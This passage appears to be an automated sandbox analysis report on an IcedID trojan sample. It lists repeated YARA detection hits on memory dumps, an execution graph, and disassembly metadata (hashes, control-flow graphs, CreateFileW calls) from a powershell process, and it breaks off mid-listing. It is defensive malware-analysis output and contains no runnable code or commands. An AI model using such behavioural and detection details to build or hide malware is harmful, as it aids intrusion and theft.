                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.494814109.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.546261720.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.581334234.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 0000000A.00000002.836565283.0000017523534000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.499065524.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.601363468.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.520814674.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.606794312.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.592288032.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.600571140.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.528524217.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.590819954.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.621728773.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.612925082.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.557676790.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.493439373.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:high

                                                                                                                                            Disassembly

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:5.5%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:7
                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                              execution_graph 31204 766e9c8 31210 766dd54 31204->31210 31206 766e9fd 31208 766eac4 CreateFileW 31209 766eb01 31208->31209 31211 766ea70 CreateFileW 31210->31211 31213 766e9e7 31211->31213 31213->31206 31213->31208

                                                                                                                                              Executed Functions

                                                                                                                                              Function 07809E08 Relevance: .9, Instructions: 910COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 994f7fecdaa4099f9e4b256d11b949fb2d8c8242871af47311dcf0c94b4e5f6a
                                                                                                                                              • Instruction ID: 351e1b18f5cf62a5f2755fd03733b6630d5da7e49b290c7aa4ca87dcae71eeb8
                                                                                                                                              • Opcode Fuzzy Hash: 994f7fecdaa4099f9e4b256d11b949fb2d8c8242871af47311dcf0c94b4e5f6a
                                                                                                                                              • Instruction Fuzzy Hash: CC72ADB57003058FCB19DF68C8546AEBBA2EF89305F14C469E806DB391DB35ED45CBA2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07667860 Relevance: .7, Instructions: 702COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 478 7667860-766789f 480 76678a5-76678e7 478->480 481 766821d-7668262 478->481 488 7667b20-7667b53 480->488 489 76678ed-7667980 480->489 493 7668264-7668266 481->493 494 7668268-766826a 481->494 503 7667c5a-7667c70 488->503 504 7667b59-7667bbc 488->504 554 7667986-76679a1 489->554 555 7667aff-7667b1e 489->555 493->494 495 7668270-7668286 494->495 496 766826c-766826e 494->496 496->495 508 7667c72-7667c78 503->508 509 7667c7e-7667cad 503->509 549 7667c42-7667c57 504->549 550 7667bc2-7667bda 504->550 508->509 511 7667d2c-7667d6d call 7667230 508->511 524 7667ce5-7667d29 call 7667230 509->524 525 7667caf-7667cca call 7667230 509->525 536 7667daf-7667dd6 511->536 537 7667d6f-7667d97 511->537 542 7667de2-7667de8 536->542 537->536 553 7667d99-7667da4 537->553 545 7667dfe-7667e04 542->545 546 7667dea-7667df8 542->546 551 7667e06-7667e14 545->551 552 7667e1a-7667e26 545->552 546->545 566 7667eda-7667ee0 546->566 549->503 556 7667bdc-7667be0 550->556 557 7667bed-7667bf7 550->557 551->552 551->566 568 7667e72-7667e7e 552->568 569 7667e28-7667e5a 552->569 570 7667dad 553->570 563 76679b7-76679c4 554->563 564 76679a3-76679a7 554->564 555->488 556->557 565 7667be2-7667be5 556->565 575 7667c0f-7667c15 557->575 576 7667bf9-7667bff 557->576 580 76679c6-76679cc 563->580 581 76679dc-76679e2 563->581 564->563 573 76679a9-76679af 564->573 565->557 571 7667ee6-7667f4b 566->571 572 76680fb-7668101 566->572 568->566 589 7667e80-7667eb2 568->589 569->568 609 7667e5c-7667e6c 569->609 570->542 624 76680a4-76680c6 571->624 625 7667f51-7667f65 571->625 578 7668107-766815e 572->578 579 76681fe-7668205 572->579 573->563 585 7667c17-7667c1b 575->585 586 7667c22-7667c40 575->586 582 7667c03-7667c05 576->582 583 7667c01 576->583 626 76681b4-76681ca 578->626 627 7668160-7668181 578->627 590 76679d0-76679d2 580->590 591 76679ce 580->591 592 76679e4-76679e8 581->592 593 76679ef-7667a06 581->593 582->575 583->575 585->586 594 7667c1d-7667c1f 585->594 586->549 586->550 589->566 618 7667eb4-7667eca 589->618 590->581 591->581 592->593 596 76679ea-76679ec 592->596 605 7667a0c-7667a51 593->605 606 7667aea-7667af9 593->606 594->586 596->593 641 7667a53-7667a5a 605->641 642 7667aba-7667acf 605->642 606->554 606->555 609->568 618->566 624->572 630 766802b-766804f 625->630 631 7667f6b-7667f86 625->631 626->579 639 7668183-7668189 627->639 640 7668199-76681b2 627->640 652 7668051-7668057 630->652 653 7668069-766809e 630->653 631->630 643 7667f8c-7667fd2 631->643 644 766818d-766818f 639->644 645 766818b 639->645 640->626 640->627 646 7667a5c-7667a60 641->646 647 7667a6d-7667a77 641->647 642->606 676 7667fd4-7667fe1 643->676 677 7668013-7668029 643->677 644->640 645->640 646->647 650 7667a62-7667a65 646->650 661 7667a8f-7667a95 647->661 662 7667a79-7667a7f 647->662 650->647 656 766805b-7668067 652->656 657 7668059 652->657 653->624 653->625 656->653 657->653 663 7667a97-7667a9b 661->663 664 7667aa2-7667ab8 661->664 666 7667a83-7667a85 662->666 667 7667a81 662->667 663->664 670 7667a9d-7667a9f 663->670 664->641 664->642 666->661 667->661 670->664 681 7667fe3-7667fe9 676->681 682 7667ff9-7668011 676->682 677->630 683 7667fed-7667fef 681->683 684 7667feb 681->684 682->676 682->677 683->682 684->682
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.455299415.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7660000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fa89d6e4ef1acba32ab025d90968ba75a3d6aaec7e91b45b2dead02387f44484
                                                                                                                                              • Instruction ID: 1ac1281b66e52fd667f121e58cfff1239cb2c4facc0a405feb15f2db12881e84
                                                                                                                                              • Opcode Fuzzy Hash: fa89d6e4ef1acba32ab025d90968ba75a3d6aaec7e91b45b2dead02387f44484
                                                                                                                                              • Instruction Fuzzy Hash: B6525B7060020ADFCB15DF74C854BAAB7B2EF85309F5085A9E90AAB390DB35DD45CFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078038A0 Relevance: .3, Instructions: 335COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c37267a5ecca9a49d1efc4d4ff22515bb93da6b53ce9bc4f467b2db73c54541b
                                                                                                                                              • Instruction ID: ba4d5cf47d94428cb551c956b0421f19f4cb13093478f4a1aa1cc6eb717500a6
                                                                                                                                              • Opcode Fuzzy Hash: c37267a5ecca9a49d1efc4d4ff22515bb93da6b53ce9bc4f467b2db73c54541b
                                                                                                                                              • Instruction Fuzzy Hash: 6DC1C1B4A007069FCB04DFA5C8546AEBBF6EF85304F10856DE906EB790DB349D4ACB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0766F610 Relevance: .2, Instructions: 234COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.455299415.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7660000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2bd72dc63c0a96c33409b6c43a19ae5a8cf901e955ef1470f36d56ae30f8892d
                                                                                                                                              • Instruction ID: 92fba4612f1c8211388d670581fbda0c52794c39446917f366e56b7c7ae62aab
                                                                                                                                              • Opcode Fuzzy Hash: 2bd72dc63c0a96c33409b6c43a19ae5a8cf901e955ef1470f36d56ae30f8892d
                                                                                                                                              • Instruction Fuzzy Hash: F3A17DB4600206DFEB15DF34D498BAABBF2BF89314F548569E4029B3A1DB78DD45CB80
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0766E9C8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 766e9c8-766e9fb call 766dd54 4 766ea26-766eabc 0->4 5 766e9fd-766ea25 0->5 14 766eac4-766eaff CreateFileW 4->14 15 766eabe-766eac1 4->15 16 766eb01-766eb07 14->16 17 766eb08-766eb25 14->17 15->14 16->17
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.455299415.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7660000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 5cc792c7adba636c96772a36b7ebcd2313383952d03b5bcb1cbdaf382ccfa561
                                                                                                                                              • Instruction ID: 70154c7dbfc52e17aa3d47afd234b9fe93e4e0a081abde58ef36a976281e91bc
                                                                                                                                              • Opcode Fuzzy Hash: 5cc792c7adba636c96772a36b7ebcd2313383952d03b5bcb1cbdaf382ccfa561
                                                                                                                                              • Instruction Fuzzy Hash: 4D41AFB1A002599FDB10DFA9D844B9EFFB5FF48310F14816AE909AB381C775A940CBE1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0766EA68 Relevance: 1.6, APIs: 1, Instructions: 64fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 20 766ea68-766eabc 23 766eac4-766eaff CreateFileW 20->23 24 766eabe-766eac1 20->24 25 766eb01-766eb07 23->25 26 766eb08-766eb25 23->26 24->23 25->26
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0766E9E7,00000000,00000000,00000003,00000000,00000002), ref: 0766EAF2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.455299415.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7660000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: be5d811fe62fe29c70457be671e75888f081783433df5f1bae3cb62fba86df6a
                                                                                                                                              • Instruction ID: 1b073a625ee314c8f74fbf389a9c0ad4a1eedc9718747fca9d2edf9c9799c3ec
                                                                                                                                              • Opcode Fuzzy Hash: be5d811fe62fe29c70457be671e75888f081783433df5f1bae3cb62fba86df6a
                                                                                                                                              • Instruction Fuzzy Hash: 8C2145B590065AAFCB10CF9AC884ADEFBB4FF08310F14851AE959A3610C375AA50CFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0766DD54 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 29 766dd54-766eabc 32 766eac4-766eaff CreateFileW 29->32 33 766eabe-766eac1 29->33 34 766eb01-766eb07 32->34 35 766eb08-766eb25 32->35 33->32 34->35
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0766E9E7,00000000,00000000,00000003,00000000,00000002), ref: 0766EAF2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.455299415.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7660000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 4e7c8e89bdd8ef2d7e5c613e40b78501c1e070f668ff15a763c99b5564f8c591
                                                                                                                                              • Instruction ID: bc12af165a5ba5b3d67c5090dbc98c50efd97be3ebafe8e6c043f92ab45540bc
                                                                                                                                              • Opcode Fuzzy Hash: 4e7c8e89bdd8ef2d7e5c613e40b78501c1e070f668ff15a763c99b5564f8c591
                                                                                                                                              • Instruction Fuzzy Hash: 162145B590061AAFCF10CF9AC888ADEFBB4FB08310F00811AE919A3710C375A950CFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075A9880 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 38 75a9880-75a988f 39 75a9891-75a9897 38->39 40 75a98a7-75a98be 38->40 41 75a989b-75a98a5 39->41 42 75a9899 39->42 46 75a98c0-75a990f 40->46 47 75a9914-75a9925 40->47 41->40 42->40 69 75a99f1-75a99f5 46->69 50 75a9949-75a9952 47->50 51 75a9927-75a992b 47->51 53 75a9969-75a9984 50->53 55 75a9954-75a9958 50->55 51->53 54 75a992d-75a9931 51->54 53->69 56 75a9933-75a993c 54->56 57 75a9986-75a99b4 54->57 58 75a995a-75a9963 55->58 59 75a99c6-75a99d4 55->59 60 75a99f6-75a9a43 56->60 63 75a9942 56->63 57->69 58->53 58->60 59->69 63->50 63->53 63->60 66 75a99b6-75a99c4 63->66 67 75a99d6-75a99e9 63->67 66->69 67->69
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                              • Opcode ID: ed0e3c048daf75a068ba580168cc5ed82d8580c401e2ff21b4c3457ad0df8d73
                                                                                                                                              • Instruction ID: 505a6c496bc460f229f2d2f2322b432695674f4fb3463777fe62453042a09bcc
                                                                                                                                              • Opcode Fuzzy Hash: ed0e3c048daf75a068ba580168cc5ed82d8580c401e2ff21b4c3457ad0df8d73
                                                                                                                                              • Instruction Fuzzy Hash: 2B518BB5B10610EFCB14DB29C49486DBBF6FF8962131585AAE86ADB361CB31EC41CB41
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AD928 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 85 75ad928-75ad99b call 75ad7b8 91 75ad9fd 85->91 92 75ad99d-75ad9a7 85->92 95 75ada02-75ada0c 91->95 93 75ad9e8-75ad9fb 92->93 94 75ad9a9-75ad9e0 92->94 93->95 94->93 96 75ada0e-75ada1d 95->96 97 75ada1f-75ada2f 95->97 102 75ada31-75ada34 96->102 97->102 104 75ada50-75ada5c 102->104 105 75ada36-75ada3d 102->105 108 75ada88-75adadb 104->108 109 75ada5e-75ada6f 104->109 105->104 106 75ada3f-75ada47 105->106 106->104 118 75adae3-75adaf5 108->118 109->108 113 75ada71-75ada86 109->113 113->108 120 75adb00-75adb4c 118->120 121 75adaf7 118->121 123 75adb4e 120->123 124 75adb57 120->124 121->120 123->124 125 75adb58 124->125 125->125
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `op
                                                                                                                                              • API String ID: 0-3810789359
                                                                                                                                              • Opcode ID: 5b71939ad82d6fbc8d6fef37a116d86fff8dc9c81752b4d937aef02f5cc6452a
                                                                                                                                              • Instruction ID: 5e01199b037e6cceb8930dfdd683db60d4bd7a647c47c32fc686897f866dccc1
                                                                                                                                              • Opcode Fuzzy Hash: 5b71939ad82d6fbc8d6fef37a116d86fff8dc9c81752b4d937aef02f5cc6452a
                                                                                                                                              • Instruction Fuzzy Hash: 45516974B00215AFD704EF68D495BEDBBB2FF88300F148169E802AB795CB35AC04CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 075AD91E Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 127 75ad91e-75ad99b call 75ad7b8 134 75ad9fd 127->134 135 75ad99d-75ad9a7 127->135 138 75ada02-75ada0c 134->138 136 75ad9e8-75ad9fb 135->136 137 75ad9a9-75ad9e0 135->137 136->138 137->136 139 75ada0e-75ada1d 138->139 140 75ada1f-75ada2f 138->140 145 75ada31-75ada34 139->145 140->145 147 75ada50-75ada5c 145->147 148 75ada36-75ada3d 145->148 151 75ada88-75adadb 147->151 152 75ada5e-75ada6f 147->152 148->147 149 75ada3f-75ada47 148->149 149->147 161 75adae3-75adaf5 151->161 152->151 156 75ada71-75ada86 152->156 156->151 163 75adb00-75adb4c 161->163 164 75adaf7 161->164 166 75adb4e 163->166 167 75adb57 163->167 164->163 166->167 168 75adb58 167->168 168->168
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.454789108.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: `op
                                                                                                                                              • API String ID: 0-3810789359
                                                                                                                                              • Opcode ID: d9e817a220e254d46d79d0362647406cb74d9db417ab1a4569f3c1688701beea
                                                                                                                                              • Instruction ID: 951b66ab6c192231c55c0b143ee2add522bf47e813c7406a7cc8455c99a92e2b
                                                                                                                                              • Opcode Fuzzy Hash: d9e817a220e254d46d79d0362647406cb74d9db417ab1a4569f3c1688701beea
                                                                                                                                              • Instruction Fuzzy Hash: 1C518C70B10204AFD714EF68D495AEDBBB2FF88300F148169E802AB795CB35AC05CFA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 07807700 Relevance: .5, Instructions: 497COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 687 7807700-7807721 688 7807727-780772b 687->688 689 7807acf-7807ae6 687->689 690 780773d-780773f 688->690 691 780772d-780773a 688->691 698 7807aed-7807afc 689->698 693 7807741 690->693 694 7807747-780779c 690->694 693->694 706 78077be-78077e5 694->706 707 780779e-78077bc 694->707 701 7807b19-7807b2b 698->701 702 7807afe-7807b16 698->702 704 7807b31-7807b66 701->704 705 7807d08-7807d30 701->705 702->701 723 7807c55-7807c68 704->723 724 7807b6c-7807b8b 704->724 722 7807d32-7807d6c 705->722 706->698 716 78077eb-7807823 706->716 707->706 716->698 732 7807829-7807856 716->732 749 7807d6e-7807d91 722->749 726 7807c6a-7807c6e 723->726 735 7807b94 724->735 736 7807b8d-7807b92 724->736 728 7807c70 726->728 729 7807c79 726->729 728->729 729->705 756 7807891-78078bc 732->756 757 7807858-7807869 732->757 739 7807b96-7807b98 735->739 736->739 740 7807c43-7807c4f 739->740 741 7807b9e-7807ba2 739->741 740->723 740->724 744 7807ba4-7807baf call 7805f10 741->744 745 7807bb6-7807bbb 741->745 744->745 754 7807bb1-7807bb3 744->754 746 7807bc4 745->746 747 7807bbd-7807bc2 745->747 752 7807bc6-7807bc8 746->752 747->752 759 7807d93-7807d99 749->759 760 7807daa-7807daf 749->760 752->740 755 7807bca-7807bf7 752->755 754->745 770 7807bf9-7807c23 755->770 771 7807c2e-7807c41 755->771 775 78078c2-78078c4 756->775 776 7807a0b-7807a15 756->776 757->756 765 780786b-780788c 757->765 759->760 762 7807d9b-7807da8 759->762 762->760 777 7807a99-7807a9d 765->777 770->771 771->726 778 78078d2 775->778 779 78078c6-78078d0 775->779 787 7807a17-7807a19 776->787 788 7807a3c-7807a4e call 7806030 776->788 781 7807aae 777->781 782 7807a9f-7807aac 777->782 780 78078d7-78078d9 778->780 779->780 780->776 785 78078df-780790a 780->785 786 7807ab3-7807ab5 781->786 782->786 801 780791b 785->801 802 780790c-7807919 785->802 791 7807ac3-7807acc 786->791 792 7807ab7-7807ac1 786->792 789 7807a27 787->789 790 7807a1b-7807a25 787->790 800 7807a54-7807a97 788->800 795 7807a2c-7807a2e 789->795 790->795 792->791 796 7807a30-7807a32 795->796 797 7807a34-7807a3a 795->797 796->777 797->777 800->777 804 7807920-7807922 801->804 802->804 806 7807924 804->806 807 7807927-780792d 804->807 806->807 808 7807949-780794d 807->808 809 780792f-7807947 807->809 810 780795e 808->810 811 780794f-780795c 808->811 809->808 812 7807963-7807965 810->812 811->812 812->777 814 780796b-7807979 812->814 816 78079c8-78079e7 814->816 817 780797b-780798e 814->817 816->777 822 78079ed-7807a04 816->822 817->816 820 7807990-78079c3 817->820 820->777 826 7807a06 822->826 826->777
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.456442477.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_7800000_powershell.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 13a41f5d468eec507f40d1679eed1e263b5ad122c2520f6d219f991a8a234d1b
                                                                                                                                              • Instruction ID: b84ba7e1a4cdc819aef708af9c2cb5a481785ed99bc839a01b250d3719b2a09b
                                                                                                                                              • Opcode Fuzzy Hash: 13a41f5d468eec507f40d1679eed1e263b5ad122c2520f6d219f991a8a234d1b
                                                                                                                                              • Instruction Fuzzy Hash: 9402BCB4B102059FDB448F69D854BAEBBF6FF99314F148069E801EB391DB74AC41CBA0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 078085E0 Relevance: .5, Instructions: 488COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 829 78085e0-78085ff 830 7808943-78089a1 829->830 831 7808605-780862b 829->831 844 7808bc2-7808bd9 830->844 845 78089a7-78089ab 830->845 836 780862d-7808637 call 78073d8 831->836 837 780863f-7808663 831->837 836->837 848 7808665-7808688 837->848 849 780868d-7808691 837->849 846 7808be0-7808c1e 844->846 845->846 847 78089b1-78089ef call 7807188 845->847 879 7808c20-7808c25 846->879 880 7808c27 846->880 893 78089f1-7808a30 847->893 894 7808a3e-7808a61 call 7807370 call 7807270 847->894 861 7808904-7808910 848->861 850 7808693-7808697 849->850 851 7808699-78086eb 849->851 850->851 854 78086f0-78086f4 850->854 851->861 857 78087c1-78087c6 854->857 858 78086fa-7808706 854->858 866 78087c8-78087cd 857->866 867 78087cf 857->867 864 7808708-7808712 call 78073d8 858->864 865 780871a-7808738 858->865 861->830 864->865 882 7808741 865->882 883 780873a-780873f 865->883 871 78087d1-78087d3 866->871 867->871 872 78088d3-78088de 871->872 873 78087d9-7808800 871->873 972 78088e1 call 78084d0 872->972 973 78088e1 call 78084cf 872->973 873->872 909 7808806-780880e 873->909 886 7808c29-7808c2b 879->886 880->886 888 7808743-7808745 882->888 883->888 891 7808c36-7808c42 886->891 892 7808c2d-7808c34 886->892 888->857 895 7808747-780874c 888->895 889 78088e7-78088fd 889->861 908 7808c4d-7808c4f 891->908 892->891 898 7808c44 892->898 920 7808a32 893->920 921 7808a3b 893->921 915 7808a63-7808a7f 894->915 916 7808a8a-7808a98 894->916 899 7808755 895->899 900 780874e-7808753 895->900 898->908 901 7808757-7808759 899->901 900->901 901->857 905 780875b-7808772 901->905 905->857 918 7808774-780878b 905->918 913 7808810-780881a 909->913 914 780881c 909->914 919 7808821-7808823 913->919 914->919 926 7808aa4-7808aaa 915->926 970 7808a9b call 7809748 916->970 971 7808a9b call 7809758 916->971 918->857 927 780878d-78087a4 918->927 919->872 923 7808829-780883a 919->923 920->921 921->894 923->872 931 7808840-7808853 923->931 924 7808aa1 924->926 929 7808af7-7808b0a 926->929 930 7808aac-7808aba 926->930 927->857 942 78087a6-78087bc 927->942 932 7808b9b-7808b9f 929->932 930->929 941 7808abc-7808ac7 930->941 937 7808859-7808861 931->937 938 78088ff 931->938 934 7808ba1 932->934 935 7808baa 932->935 934->935 935->844 939 7808863-780886c 937->939 940 780886e 937->940 938->861 943 7808873-7808881 939->943 940->943 941->929 948 7808ac9-7808ad1 941->948 942->861 944 7808883-7808886 943->944 945 78088a6-78088a8 943->945 944->938 947 7808888-7808890 944->947 949 